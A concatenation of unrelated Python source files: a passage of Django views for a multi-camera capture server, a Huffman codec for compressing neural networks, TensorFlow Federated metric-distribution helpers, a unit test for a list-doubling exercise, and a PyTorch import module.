g_logger.error('parallel_all_finalize_single %s: %s' % (node.machine_name, e))
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_record_single_image(request):
if request.method == 'POST':
j = json.loads(request.body)
if 'location' in j:
location_id = j['location']
if not has_write_access_location_id(request, location_id):
return HttpResponse(status=403)
nodes = CaptureNode.objects.filter(location__id=location_id, online=True)
session_id = j['session_id'] if 'session_id' in j else None
shot_name = j['shot'] if 'shot' in j else None
create_session_shot(location_id, session_id, shot_name)
summary = {}
summary['result'] = 'OK'
summary['nodes'] = []
# Prepare Single Image Capture
g_pool.map(parallel_all_prepare_single, nodes)
g_pool.map(parallel_all_prepare_multi2, nodes)
# Start Single Image Capture
g_pool.map(parallel_all_start_single, nodes)
# Finalize Single Image Capture
g_pool.map(parallel_all_finalize_single, [(n,summary['nodes']) for n in nodes])
# Add rotation flag to all cameras (this info is in th DB, and does not come from the nodes)
add_rotation_info_to_cameras(summary)
# Store capture in archive
register_new_take(location_id, summary)
return JSONResponse(summary)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_new_session(request, location_id="0"):
if request.method == 'POST':
location_id = int(location_id)
# Create new session at this location
g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
if not g:
return HttpResponse(status=403)
loc = CaptureLocation.objects.get(pk=location_id)
if not loc:
return HttpResponse(status=404)
j = json.loads(request.body)
if not 'name' in j:
return HttpResponse(status=500)
session_name = j['name']
# Is the session name unique?
i = 0
while ArchiveSession.objects.filter(name=session_name, project=loc.cur_project).count()>0:
session_name = '%s_%03d' % (j['name'], i)
i = i + 1
# Create New Session
session = ArchiveSession(name=session_name, project=loc.cur_project)
session.save()
g[0].cur_session = session
g[0].cur_shot = None
g[0].save()
result = {}
result['session_name'] = session.name
result['session_id'] = session.id
return JSONResponse(result)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_set_roi(request, camera_id="0"):
if request.method == 'POST':
camera_id = int(camera_id)
camera = Camera.objects.get(pk=camera_id)
location_id = camera.node.location.id
write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
if not write_access:
return HttpResponse(status=403)
# TODO Send request to node
# TODO Update ROI in DB for camera
try:
print 'test'
result = urllib2.urlopen('http://%s:8080/camera/%s/%s' % (camera.node.ip_address, camera.unique_id, 'roi'), data=request.body, timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('post_set_roi %s: %s' % (camera.node.machine_name, e))
return HttpResponse(status=200)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_reset_roi(request, camera_id="0"):
if request.method == 'POST':
camera_id = int(camera_id)
camera = Camera.objects.get(pk=camera_id)
location_id = camera.node.location.id
write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
if not write_access:
return HttpResponse(status=403)
# TODO Send request to node
# TODO Update ROI in DB for camera
try:
result = urllib2.urlopen('http://%s:8080/camera/%s/%s' % (camera.node.ip_address, camera.unique_id, 'roi'), data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
except Exception as e:
g_logger.error('post_set_roi %s: %s' % (camera.node.machine_name, e))
return HttpResponse(status=200)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def post_new_shot(request, location_id="0"):
if request.method == 'POST':
location_id = int(location_id)
# Create new session at this location
g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
if g:
g[0].cur_shot = None
g[0].save()
return HttpResponse(status=200)
else:
return HttpResponse(status=403)
@api_view(['GET', 'POST'])
@permission_classes((IsAuthenticated,))
def camera_parameter(request, location_id="0"):
location_id = int(location_id)
if request.method == 'POST':
location_id = int(location_id)
g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
if not g:
return HttpResponse(status=403)
j = json.loads(request.body)
camera = Camera.objects.get(pk=j['cam_id'])
if not camera:
return HttpResponse(status=404)
# Some parameters are saved in the DB
# TODO Generalize DB for parameters
if j['parameter_name'] == 'exposure':
camera.exposure = j['value']
camera.save()
if j['parameter_name'] == 'lens_aperture_value':
camera.lens_aperture = j['value']
camera.save()
if j['parameter_name'] == 'gain':
camera.gain = j['value']
camera.save()
# Update Node with new value
try:
result = urllib2.urlopen('http://%s:8080/camera/%s/%s/%s' % (camera.node.ip_address, camera.unique_id, j['parameter_name'], j['value']), data="", timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
return JSONResponse(result)
except Exception as e:
g_logger.error('camera_parameter %s: %s' % (camera.node.machine_name, e))
def apply_options_on_node(p):
node, body, msgs = p
try:
serialized_data = urllib2.urlopen('http://%s:8080/options/' % (node.ip_address), data=body, timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
msgs.append('Options set on %s\n' % node.ip_address)
except Exception as e:
msgs.append('Error setting option on %s\n' % node.ip_address)
g_logger.error('location_config %s: %s' % (node.machine_name, e))
@api_view(['GET', 'POST'])
@permission_classes((IsAuthenticated,))
def location_config(request, location_id="0"):
location_id = int(location_id)
if request.method == 'GET':
loc = CaptureLocation.objects.filter(id=location_id, read_access_all=True) # Try with locations readable by all
if not loc:
loc = request.user.access_rights.filter(id=location_id, locationaccess__read_access=True) # Filter by access rights
if loc:
result = {}
result['hardware_sync_frequency'] = loc[0].hardware_sync_frequency
result['pulse_duration'] = loc[0].pulse_duration
result['external_sync'] = loc[0].external_sync
return JSONResponse(result)
return HttpResponse(status=403)
if request.method == 'POST':
msgs = []
location_id = int(location_id)
g = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True)
if g:
j = json.loads(request.body)
# Store location options in DB
if 'pulse_duration' in j:
g[0].pulse_duration = int(j['pulse_duration'])
if 'frequency' in j:
g[0].hardware_sync_frequency = int(j['frequency'])
if 'external_sync' in j:
g[0].external_sync = bool(j['external_sync'])
if 'display_focus_peak' in j:
g[0].display_focus_peak = bool(j['display_focus_peak'])
if 'display_overexposed' in j:
g[0].display_overexposed = bool(j['display_overexposed'])
if 'display_histogram' in j:
g[0].display_histogram = bool(j['display_histogram'])
if 'bitdepth_avi' in j:
g[0].bitdepth_avi = int(j['bitdepth_avi'])
if 'bitdepth_single' in j:
g[0].bitdepth_single = int(j['bitdepth_single'])
# set options on all nodes
nodes = CaptureNode.objects.filter(online=True, location__id=location_id)
g_pool.map(apply_options_on_node, [(n, request.body, msgs) for n in nodes])
g[0].save()
return HttpResponse('Ok ' + ' '.join(msgs))
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def get_locations(request):
# Use this opportunity to update any timed-out location
CaptureNode.objects.filter(online=True, last_seen__lt=timezone.now() - datetime.timedelta(seconds=90)).update(online=False)
result = {}
result['locations'] = []
for loc in CaptureLocation.objects.all():
read_access = loc.read_access_all or loc.users.filter(id=request.user.id, locationaccess__read_access=True).count()>0
result['locations'].append({
'name':loc.name,
'id':loc.id,
'active':Camera.objects.filter(node__online=True, node__last_seen__gt=timezone.now() - datetime.timedelta(seconds=90), node__location=loc.id).count(),
'access':read_access})
unknown_count = Camera.objects.filter(node__online=True, node__last_seen__gt=timezone.now() - datetime.timedelta(seconds=90), node__location__isnull=True).count()
if unknown_count>0:
result['locations'].append({
'name':'Unknown',
'id':0,
'active':unknown_count,
'access':True})
# Add extra statistics about the whole system
result['nb_running_jobs'] = FarmJob.objects.filter(status='running').count()
result['nb_queued_jobs'] = FarmJob.objects.filter(status='ready').count()
result['nb_farmnodes_active'] = FarmNode.objects.filter(status='accepting').filter(last_seen__gt=timezone.now() - datetime.timedelta(seconds=90)).count()
return JSONResponse(result)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def location(request, location_id="0"):
location_id = int(location_id)
if not location_id:
return HttpResponse(status=404)
loc = CaptureLocation.objects.get(pk=location_id)
if loc:
return HttpResponse(loc.name)
return HttpResponse(status=404)
def fetch_camera_details_from_node(n):
try:
# Fetch additional data directly from capture node
serialized_data = urllib2.urlopen('http://%s:8080/cameras' % n['ip_address'], timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
#print serialized_data
n['camera_details'] = json.loads(serialized_data)
except Exception as e:
g_logger.error('fetch_camera_details_from_node %s: %s' % (n['ip_address'], e))
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def cameras_detailed(request, location_id="0"):
# Get details from all cameras, including details obtained from the node itself (includes small thumbnail)
location_id = int(location_id)
# Check permission for this location_id
read_access = True
write_access = False
if not location_id:
return HttpResponse(status=500)
loc = CaptureLocation.objects.get(pk=location_id)
read_access = loc.read_access_all or request.user.access_rights.filter(id=location_id, locationaccess__read_access=True).count()>0
if not read_access:
return HttpResponse(status=403)
write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
# filter nodes by location
if location_id>0:
nodes = CaptureNode.objects.filter(location=location_id, online=True, last_seen__gt=timezone.now() - datetime.timedelta(seconds=90)).order_by('machine_name')
else:
nodes = CaptureNode.objects.filter(location__isnull=True, online=True, last_seen__gt=timezone.now() - datetime.timedelta(seconds=90)).order_by('machine_name')
serializer = CaptureNodeSerializer(nodes, many=True, context={'request':request})
nodes = serializer.data
result = {}
# # Check if the current session is from a different day, in that case we always start a new session
# if loc.cur_session:
# current_tz = timezone.get_current_timezone()
# if not timezone.now().date() == loc.cur_session.start_time.date():
# print 'Current Session is from a different date'
# loc.cur_session = None
# loc.cur_shot = None
# loc.save()
# Add location information
result['read_access'] = read_access
result['write_access'] = write_access
if not loc.cur_project:
# Create default project for this location
prj = ArchiveProject(name='Default_'+loc.name)
prj.save()
loc.cur_project = prj
loc.save()
if loc.cur_project:
result['project_id'] = loc.cur_project.id
result['project_name'] = loc.cur_project.name
if loc.cur_session:
result['session_id'] = loc.cur_session.id
result['session_name'] = loc.cur_session.name
else:
result['session_id'] = None
result['session_name'] = "-new-"
if loc.cur_shot:
result['shot_id'] = loc.cur_shot.id
result['shot_name'] = loc.cur_shot.name
result['next_take'] = loc.cur_shot.next_take
else:
result['shot_id'] = None
result['shot_name'] = "-new-"
result['next_take'] = 1
result['location'] = {}
result['location']['show_focus_peak'] = loc.display_focus_peak
result['location']['show_overexposed'] = loc.display_overexposed
result['location']['show_histogram'] = loc.display_histogram
result['location']['bitdepth_avi'] = loc.bitdepth_avi
result['location']['bitdepth_single'] = loc.bitdepth_single
result['location']['hardware_sync_frequency'] = loc.hardware_sync_frequency
result['location']['pulse_duration'] = loc.pulse_duration
result['location']['external_sync'] = loc.external_sync
result['nodes'] = nodes
# Fetch data from each node in parallel
g_pool.map(fetch_camera_details_from_node, nodes)
# Find corresponding database id for each camera
for node in nodes:
if 'camera_details' in node:
# get map of database id vs unique_id from the CaptureNodeSerializer
cam_id_map = {}
for x in node['cameras']:
cam_id_map[x['unique_id']] = x
# Add database id to each camera
for cam in node['camera_details']:
cam['ip_address'] = node['ip_address']
cam['machine_name'] = node['machine_name']
if cam['unique_id'] in cam_id_map:
cam['id'] = cam_id_map[cam['unique_id']]['id']
cam['rotation'] = cam_id_map[cam['unique_id']]['rotation']
return JSONResponse(result)
@api_view(['GET'])
@permission_classes((IsAuthenticated,))
def camera_detailed(request, location_id="0", camera_id="0"):
# Get details of one camera, including large thumbnail
location_id = int(location_id)
camera_id = int(camera_id)
# Check permission for this location_id
read_access = True
write_access = False
if location_id:
read_access = CaptureLocation.objects.get(pk=location_id).read_access_all or request.user.access_rights.filter(id=location_id, locationaccess__read_access=True).count()>0
if not read_access:
return HttpResponse(status=403)
write_access = request.user.access_rights.filter(id=location_id, locationaccess__write_access=True).count()>0
# filter camera by location and id
cameras = Camera.objects.filter(node__location=location_id, id=camera_id)
if cameras:
camera = cameras[0]
serializer = CameraSerializer(camera, many=False, context={'request':request})
data = serializer.data
result = {}
result['camera'] = data
# Fetch image data directly from capture node
try:
jpeg_data = urllib2.urlopen('http://%s:8080/camera/%s/large_preview' % (camera.node.ip_address, camera.unique_id), timeout=DEFAULT_NODE_HTTP_TIMEOUT).read()
result['jpeg_full'] = b64encode(jpeg_data)
except Exception as e:
g_logger.error('large_preview %s: %s' % (camera.node.machine_name, e))
return JSONResponse(result)
else:
return HttpResponse(status=404)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def node_discover(request):
g_logger.debug('Node Discover %s' % request.data['machine_name'])
# Look for existing machine in the database, with the same name
nodes = CaptureNode.objects.filter(machine_name=request.data['machine_name'])
if nodes:
# Node exists in database, update it
node = nodes[0]
node.ip_address = request.data['ip_address']
node.last_seen = timezone.now()
else:
# Node does not exist, create it
node = CaptureNode(ip_address=request.data['ip_address'], machine_name=request.data['machine_name'])
if 'sync_found' in request.data:
node.sync_found = request.data['sync_found']
if 'os' in request.data:
node.os = request.data['os']
node.online = True
node.code_version = request.data['code_version'] if 'code_version' in request.data else 0
if node.code_version < 1024:
return JSONResponse({'Result':'avacapture.exe Version Too Old'}, status=426)
# Update drive info
if 'drives' in request.data:
node.drive_info = json.dumps(request.data['drives'])
node.save()
# Update list of cameras
if 'cameras' in request.data:
# TODO We should be getting each cameras Model and Version here, to update the DB
if type(request.data) is dict:
cam_list = request.data['cameras']
else:
cam_list = request.data.getlist('cameras')
for unique_id in cam_list:
# if camera does no exist, create it
obj = Camera.objects.filter(unique_id=unique_id, node=node)
if not obj:
obj = Camera(node=node, unique_id=unique_id)
obj.save()
# delete any cameras that are not in the list
for item in Camera.objects.filter(node=node).exclude(unique_id__in=cam_list):
item.delete()
if node.location:
result = {'Result':'OK',
'sync_freq':node.location.hardware_sync_frequency,
'pulse_duration':node.location.pulse_duration,
'external_sync':node.location.external_sync,
'display_focus_peak' : node.location.display_focus_peak,
'display_overexposed' : node.location.display_overexposed,
'display_histogram' : node.location.display_histogram,
'bitdepth_avi' : node.location.bitdepth_avi,
'bitdepth_single' : node.location.bitdepth_single
}
else:
return HttpResponse("Node not registered", status=403)
if 'request_camera_params' in request.data:
# client is requesting the current parameters of the cameras
cameras = Camera.objects.filter(node=node)
# TODO Generalize DB for parameters
result['camera_params'] = [dict(unique_id=cam.unique_id,
lens_aperture_value=cam.lens_aperture,
exposure=cam.exposure,
gain=cam.gain,
using_sync=cam.using_sync) for cam in cameras]
# TODO Camera roi
# return JSON data for the current machine
return JSONResponse(result)
@api_view(['POST'])
@permission_classes((IsAuthenticated,))
def node_shutdown(request):
g_logger.debug('Node Shutdown %s' % request.data['ip_address'])
nodes = CaptureNode.objects.filter(ip_address=request.data['ip_address'])
for node in nodes:
node.online = False
node.save()
return JSONResponse({'Result':'OK'})
|
import re
import torch
from .encode import EncodedParam, EncodedModule
from ..utils import AverageMeter
class Codec(object):
def __init__(self, rule):
"""
Codec for coding
:param rule: str, path to the rule file, each line formats
'param_name coding_method bit_length_fixed_point bit_length_fixed_point_of_integer_part
bit_length_of_zero_run_length'
list of tuple,
[(param_name(str), coding_method(str), bit_length_fixed_point(int),
bit_length_fixed_point_of_integer_part(int), bit_length_of_zero_run_length(int))]
"""
if isinstance(rule, str):
content = map(lambda x: x.split(), open(rule).readlines())
content = filter(lambda x: len(x) == 5, content)
rule = list(map(lambda x: (x[0], x[1], int(x[2]), int(x[3]), int(x[4])), content))
assert isinstance(rule, list) or isinstance(rule, tuple)
self.rule = rule
self.stats = {
'compression_ratio': {
'compressed': AverageMeter(),
'total': AverageMeter()
},
'memory_size': {
'codebook': AverageMeter(),
'param': AverageMeter(),
'compressed_param': AverageMeter(),
'index': AverageMeter(),
'total': AverageMeter()
},
'detail': dict()
}
print("=" * 89)
print("Initializing Huffman Codec\n"
"Rules\n"
"{rule}".format(rule=self.rule))
print("=" * 89)
def reset_stats(self):
"""
reset stats of codec
:return:
void
"""
self.stats['detail'] = dict()
for _, v in self.stats['compression_ratio'].items():
v.reset()
for _, v in self.stats['memory_size'].items():
v.reset()
def encode_param(self, param, param_name):
"""
encode the parameters based on rule
:param param: torch.(cuda.)tensor, parameter
:param param_name: str, name of parameter
:return:
EncodedParam, encoded parameter
"""
rule_id = -1
for idx, x in enumerate(self.rule):
m = re.match(x[0], param_name)
if m is not None and len(param_name) == m.span()[1]:
rule_id = idx
break
if rule_id > -1:
rule = self.rule[rule_id]
encoded_param = EncodedParam(param, method=rule[1],
bit_length=rule[2], bit_length_integer=rule[3],
encode_indices=True, bit_length_zero_run_length=rule[4])
return encoded_param
else:
return None
def encode(self, model):
"""
encode network based on rule
:param model: torch.(cuda.)module, network model
:return:
EncodedModule, encoded model
"""
assert isinstance(model, torch.nn.Module)
self.reset_stats()
encoded_params = dict()
print("=" * 89)
print("Start Encoding")
print("=" * 89)
print("{:^30} | {:<25} | {:<25} | {:<25} | {:<25} | {:<25} | {:<25} | {:<25}".
format('Param Name', 'Param Density', 'Param Bit', 'Index Bit', 'Param Mem',
'Index Mem', 'Codebook Mem', 'Compression Ratio'))
for param_name, param in model.named_parameters():
if 'AuxLogits' in param_name:
# deal with googlenet
continue
encoded_param = self.encode_param(param=param.data, param_name=param_name)
if encoded_param is not None:
# check encoded result
assert torch.equal(param.data, encoded_param.data)
stats = encoded_param.stats
print("{param_name:^30} | {density:<25} | {bit_param:<25} | {bit_index:<25} | "
"{mem_param:<25} | {mem_index:<25} | {mem_codebook:<25} | {compression_ratio:<25}"
.format(param_name=param_name, density=stats['num_nz'] / stats['num_el'],
bit_param=stats['bit_length']['param'], bit_index=stats['bit_length']['index'],
mem_param=stats['memory_size']['param'], mem_index=stats['memory_size']['index'],
mem_codebook=stats['memory_size']['codebook'],
compression_ratio=stats['compression_ratio']))
encoded_params[param_name] = encoded_param
# statistics
self.stats['compression_ratio']['compressed'].accumulate(stats['num_el'] * 32,
stats['memory_size']['total'])
self.stats['compression_ratio']['total'].accumulate(stats['num_el'] * 32,
stats['memory_size']['total'])
self.stats['memory_size']['codebook'].accumulate(stats['memory_size']['codebook'])
self.stats['memory_size']['param'].accumulate(stats['memory_size']['param'])
self.stats['memory_size']['index'].accumulate(stats['memory_size']['index'])
self.stats['memory_size']['compressed_param'].accumulate(stats['memory_size']['param'])
self.stats['detail'][param_name] = stats
else:
print("{:^30} | skipping".format(param_name))
memory_size_param = param.data.numel() * 32
self.stats['compression_ratio']['total'].accumulate(memory_size_param, memory_size_param)
self.stats['memory_size']['param'].accumulate(memory_size_param)
print("=" * 89)
print("Stop Encoding")
print("=" * 89)
print("Compress Ratio | {}\n"
"Overall Compress Ratio | {}\n"
"Codebook Memory Size | {:.3f} KB\n"
"Compressed Param Memory Size | {:.3f} KB\n"
"Index Memory Size | {:.3f} KB\n"
"Overall Param Memory Size | {:.3f} KB"
.format(self.stats['compression_ratio']['compressed'].avg,
self.stats['compression_ratio']['total'].avg,
self.stats['memory_size']['codebook'].sum / 8 / 1024,
self.stats['memory_size']['compressed_param'].sum / 8 / 1024,
self.stats['memory_size']['index'].sum / 8 / 1024,
self.stats['memory_size']['param'].sum / 8 / 1024))
print("=" * 89)
return EncodedModule(module=model, encoded_param=encoded_params)
@staticmethod
def decode(model, state_dict):
"""
decode the network using state dict from EncodedModule
:param model: torch.nn.module, network model
:param state_dict: state dict from EncodedModule
:return:
torch.nn.module, decoded network
"""
assert isinstance(model, torch.nn.Module)
print("=" * 89)
print("Start Decoding")
for param_name, param in model.named_parameters():
if 'AuxLogits' in param_name:
# deal with googlenet
state_dict[param_name] = param.data
elif param_name in state_dict and isinstance(state_dict[param_name], dict):
print("Decoding {}".format(param_name))
encoded_param = EncodedParam()
encoded_param.load_state_dict(state_dict[param_name])
state_dict[param_name] = encoded_param.data
model.load_state_dict(state_dict)
print("Stop Decoding")
print("=" * 89)
return model
|
# Copyright 2021, Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for computing distributions of metrics across clients."""
import collections
import functools
import itertools
from typing import Callable, Mapping, Sequence
import tensorflow as tf
import tensorflow_federated as tff
import tensorflow_probability as tfp
INPUT_TENSOR_SPEC = tf.TensorSpec(shape=([None]), dtype=tf.float32)
WEIGHTS_TENSOR_SPEC = tf.TensorSpec(shape=([None]), dtype=tf.float32)
StatFnType = Callable[[tf.Tensor, tf.Tensor], tf.Tensor]
CLIENTS_PER_CHUNK = 50
@tf.function
def compute_metrics(model: tff.learning.Model,
eval_weights: tff.learning.ModelWeights,
metrics: Sequence[tf.keras.metrics.Metric],
dataset: tf.data.Dataset):
"""Computes metrics for a given model, model weights, and dataset.
The model must be a `tff.learning.Model` with a single output model
prediction. In particular, the output of `model.forward_pass(...)` must have
an attribute `predictions` with shape matching that of the true labels
in `dataset`.
Args:
model: A `tff.learning.Model` used for evaluation.
eval_weights: A `tff.learning.ModelWeights` that can be assigned to the
model weights of `model`. These weights are used for evaluation.
metrics: A sequence of `tf.keras.metrics.Metric` objects.
dataset: A `tf.data.Dataset` whose batches match the expected structure of
`model.forward_pass`.
Returns:
A `collections.OrderedDict` of metrics values computed for the given model
at the given model weights over the input dataset.
"""
model_weights = tff.learning.ModelWeights.from_model(model)
tf.nest.map_structure(lambda x, y: x.assign(y), model_weights, eval_weights)
num_examples = tf.constant(0, dtype=tf.int32)
for batch in dataset:
if hasattr(batch, '_asdict'):
batch = batch._asdict()
output = model.forward_pass(batch, training=False)
y_pred = output.predictions
# TODO(b/187941327): Avoid having to branch here once we are confident that
# we are only passing in datasets that yield tuples.
if isinstance(batch, collections.abc.Mapping):
y_true = batch.get('y')
else:
y_true = batch[1]
for metric in metrics:
metric.update_state(y_true, y_pred)
num_examples += tf.shape(y_true)[0]
metric_results = collections.OrderedDict()
for metric in metrics:
metric_results[metric.name] = tf.cast(metric.result(), dtype=tf.float32)
metric_results['num_examples'] = tf.cast(num_examples, dtype=tf.float32)
return metric_results
def create_federated_eval_distribution_computation(
model_fn: Callable[[], tff.learning.Model],
metrics_builder: Callable[[], Sequence[tf.keras.metrics.Metric]]
) -> tff.Computation:
"""Builds a TFF computation for computing distributions of client metrics.
Args:
model_fn: A no-arg function that returns a `tff.learning.Model`. This method
must not capture TensorFlow tensors or variables and use them.
metrics_builder: A no-arg function that returns a sequence of
`tf.keras.metrics.Metric` objects. These metrics must have a callable
`update_state` accepting `y_true` and `y_pred` arguments, corresponding to
the true and predicted label, respectively.
Returns:
A `tff.federated_computation` that accepts a `tff.learning.ModelWeights`
structure placed at `SERVER` matching the model structure of
`model_fn()`, and a federated dataset. This computation returns
a sequence of evaluation metrics computed over all clients.
"""
# Wrap model construction in a graph to avoid polluting the global context
# with variables created for this model.
with tf.Graph().as_default():
placeholder_model = model_fn()
model_weights_type = tff.learning.framework.weights_type_from_model(
placeholder_model)
model_input_type = tff.SequenceType(placeholder_model.input_spec)
@tff.tf_computation(model_weights_type, model_input_type)
def compute_client_metrics(model_weights, dataset):
model = model_fn()
metrics = metrics_builder()
return compute_metrics(model, model_weights, metrics, dataset)
@tff.federated_computation(
tff.type_at_server(model_weights_type),
tff.type_at_clients(model_input_type))
def fed_eval(model_weights, federated_dataset):
"""Computes client metrics across all clients and collects them."""
client_model = tff.federated_broadcast(model_weights)
return tff.federated_map(compute_client_metrics,
(client_model, federated_dataset))
return fed_eval
def create_federated_eval_distribution_fn(
model_fn: Callable[[], tff.learning.Model],
metrics_builder: Callable[[], Sequence[tf.keras.metrics.Metric]],
stat_fns: Mapping[str, StatFnType]):
"""Compute custom statistics across client metrics.
Args:
model_fn: A no-arg function that returns a `tff.learning.Model`. This method
must not capture TensorFlow tensors or variables and use them.
metrics_builder: A no-arg function that returns a sequence of
`tf.keras.metrics.Metric` objects. These metrics must have a callable
`update_state` accepting `y_true` and `y_pred` arguments, corresponding to
the true and predicted label, respectively.
stat_fns: A mapping in which each key-value pair represents a custom
statistic to be evaluated on the client metrics. Each pair consists of a
string-typed key describing this statistic, and a callable-typed value
that computes the statistic of metrics. The callable value should accept
two sequence-typed arguments `all_clients_this_metric` and
`all_clients_num_examples` and returns the corresponding statistics.
Returns:
A callable that accepts a `tff.learning.ModelWeights`
structure placed at `SERVER` matching the model structure of
`model_fn()`, and a federated dataset. This computation returns
an OrderedDict of statistics of metrics computed based on stat_fns.
"""
fed_eval = create_federated_eval_distribution_computation(
model_fn, metrics_builder)
def eval_metric_distribution(model_weights: tff.learning.ModelWeights,
federated_dataset):
take = lambda n, iterable: list(itertools.islice(iterable, n))
chunked_federated_dataset = iter(
functools.partial(take, CLIENTS_PER_CHUNK, iter(federated_dataset)), [])
map_fn = lambda fds: fed_eval(model_weights, fds)
chunked_all_clients_all_metrics = map(map_fn, chunked_federated_dataset)
all_clients_all_metrics = list(
itertools.chain.from_iterable(chunked_all_clients_all_metrics))
all_clients_num_examples = [
one_client_all_metrics['num_examples']
for one_client_all_metrics in all_clients_all_metrics
]
all_clients_num_examples = tf.convert_to_tensor(
all_clients_num_examples, dtype=tf.float32)
metric_names = all_clients_all_metrics[0].keys()
distribution_metrics = collections.OrderedDict()
for metric_name in metric_names:
if metric_name == 'num_examples':
continue
all_clients_this_metric = [
one_client_all_metrics[metric_name]
for one_client_all_metrics in all_clients_all_metrics
]
for stat_name, stat_fn in stat_fns.items():
distribution_metrics[metric_name + f'/{stat_name}'] = stat_fn(
tf.convert_to_tensor(all_clients_this_metric, dtype=tf.float32),
all_clients_num_examples).numpy()
return distribution_metrics
return eval_metric_distribution
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def unweighted_avg(input_tensor, weights_tensor):
"""Compute the unweighted averaging of a given tensor."""
del weights_tensor
return tf.reduce_mean(input_tensor)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def weighted_avg(input_tensor, weights_tensor):
"""Compute the weighted averaging of a given tensor."""
result_tensor = tf.reduce_sum(
input_tensor * weights_tensor) / tf.reduce_sum(weights_tensor)
return result_tensor
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def unweighted_std(input_tensor, weights_tensor):
"""Compute the (unweighted) population variance of a given tensor."""
del weights_tensor
return tf.math.reduce_std(input_tensor)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def unweighted_var(input_tensor, weights_tensor):
"""Compute the unweighted population standard deviation of a given tensor."""
del weights_tensor
return tf.math.reduce_variance(input_tensor)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct95(input_tensor, weights_tensor):
"""Compute the 95th percentile of a given tensor."""
del weights_tensor
return tfp.stats.percentile(input_tensor, 95)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct75(input_tensor, weights_tensor):
"""Compute the 75th percentile of a given tensor."""
del weights_tensor
return tfp.stats.percentile(input_tensor, 75)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def median(input_tensor, weights_tensor):
"""Compute the 50th percentile of a given tensor."""
del weights_tensor
return tfp.stats.percentile(input_tensor, 50)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct25(input_tensor, weights_tensor):
"""Compute the 25th percentile of a given tensor."""
del weights_tensor
return tfp.stats.percentile(input_tensor, 25)
@tf.function(input_signature=[INPUT_TENSOR_SPEC, WEIGHTS_TENSOR_SPEC])
def pct5(input_tensor, weights_tensor):
"""Compute the 5th percentile of a given tensor."""
del weights_tensor
return tfp.stats.percentile(input_tensor, 5)
ALL_STAT_FNS = {
'avg': unweighted_avg,
'wavg': weighted_avg,
'var': unweighted_var,
'med': median,
'pct95': pct95,
'pct75': pct75,
'pct25': pct25,
'pct5': pct5
}
|
import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load, load_module, reload_module, get_stdout, check_source
from functools import reduce
import os
import textwrap
from random import randint
exercise = 'src.items_multiplied_by_two'
function = 'double_items'
@points('5.double_items')
class DoubleItemsTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', side_effect=[AssertionError("Asking input from the user was not expected")]):
cls.module = load_module(exercise, 'en')
def test_0_main_program_ok(self):
ok, line = check_source(self.module)
message = """The code for testing the functions should be placed inside
if __name__ == "__main__":
block. The following row should be moved:
"""
self.assertTrue(ok, message+line)
def test_1_function_exists(self):
try:
from src.items_multiplied_by_two import double_items
except:
self.assertTrue(False, 'Your code should contain function named as double_items(numbers: list)' )
try:
from src.items_multiplied_by_two import double_items
double_items([1])
except:
self.assertTrue(False, 'Make sure, that function can be called as follows\ndouble_items([1])' )
def test_2_type_of_return_value(self):
double_items = load(exercise, function, 'en')
val = double_items([1])
self.assertTrue(type(val) == list, f"Function {function} does not return value of list type when calling double_items([1]).")
def test_3_lists(self):
test_cases = ([1,3,5,7], [2,6,4,8,2,6,4], [9,7,5,3,1], [10,100,1000,100,10], [9,9,9,9,9])
for test_case in test_cases:
with patch('builtins.input', side_effect=[AssertionError("Asking input from the user was not expected")]):
reload_module(self.module)
output_at_start = get_stdout()
double_items = load(exercise, function, 'en')
correct = [x*2 for x in test_case]
test_case2 = test_case[:]
try:
test_result = double_items(test_case)
except:
self.assertTrue(False, f"Make sure, that the function works when the input is\n{test_case2}")
self.assertEqual(correct, test_result, f"The result\n{test_result} \ndoes not match with the model solution\n{correct} \nwhen the input is\n{test_case2}")
self.assertEqual(test_case, test_case2, f"Function should not change the original list. The value should should be {test_case2} but it is {test_case}.")
if __name__ == '__main__':
unittest.main() |
from .conv_expanded_weights import ConvPerSampleGrad
from .embedding_expanded_weights import EmbeddingPerSampleGrad
from .linear_expanded_weights import LinearPerSampleGrad
from .expanded_weights_impl import ExpandedWeight
